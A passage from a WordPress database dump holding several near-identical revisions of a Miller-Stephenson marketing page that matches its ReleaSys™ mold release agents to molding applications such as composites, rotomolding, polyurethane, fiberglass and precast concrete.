PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n<p><a name="advanced composites"></a></p>\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:13:10', '2017-06-08 18:13:10', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4517, 2, '2017-06-08 18:13:38', '2017-06-08 18:13:38', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC"]\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:13:38', '2017-06-08 18:13:38', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4518, 2, '2017-06-08 18:14:13', '2017-06-08 18:14:13', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC"]\r\n<p><a name="advanced composites"></a></p>\r\n\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:14:13', '2017-06-08 18:14:13', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4519, 2, '2017-06-08 18:14:55', '2017-06-08 18:14:55', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC"]\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and 